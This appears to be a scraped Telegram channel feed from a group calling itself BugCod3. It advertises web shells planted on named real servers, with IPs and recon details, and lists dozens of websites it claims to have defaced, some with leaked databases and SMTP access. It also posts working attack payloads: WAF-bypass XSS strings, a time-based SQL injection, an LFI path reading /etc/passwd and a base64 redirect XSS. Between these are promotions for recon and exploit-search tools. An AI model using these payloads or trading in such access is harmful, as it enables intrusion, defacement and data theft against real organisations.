PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://fnsir.ru/
https://dzhakkolo.fnsir.ru/index.html
https://kerling.fnsir.ru/index.html
https://kornhol.fnsir.ru/index.html
https://krokinol.fnsir.ru/index.html
https://novus.fnsir.ru/index.html
https://shafflbord.fnsir.ru/index.html
https://worldnovuss.com/index.html

👁‍🗨 Mirror-h

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/

👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

👁‍🗨 Mirror-h

📊 Database

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #bugbountytips #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>

Vector PoC

#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW

MySQL

#bugbountytip #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

👁‍🗨 Mirror-h

Country: 🇯🇵🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Free Shell

🔗 Link

#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/

👁‍🗨 Mirror-h

📊 Database

🛡 Smtp

📧 LeafMailer

🔒 bugcod3

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

☠️ xnLinkFinder v4.4 ☠️

💬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:

cd xnLinkFinder
sudo python setup.py install

💻 Usage:

python xnLinkFinder.py --help

📂 Examples:

#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Discover #Endpoints
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

NetProbe: Network Probe

💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:

cd NetProbe
pip install -r requirements.txt

💻 Usage:

python3 netprobe.py —help

📂 Example:

python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Network #Scanner #Vulnerability #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/

👁‍🗨 Mirror-h

📊 Database (tridentresortsholidays.com)

Country: 🇺🇸🇮🇹

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit

I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘 Twitter

#bugbounty #xss #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

ALWAYS test 404 Not Found in Bug Bounties!

🔗 Medium
🔗 Freedium

#Writeup
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3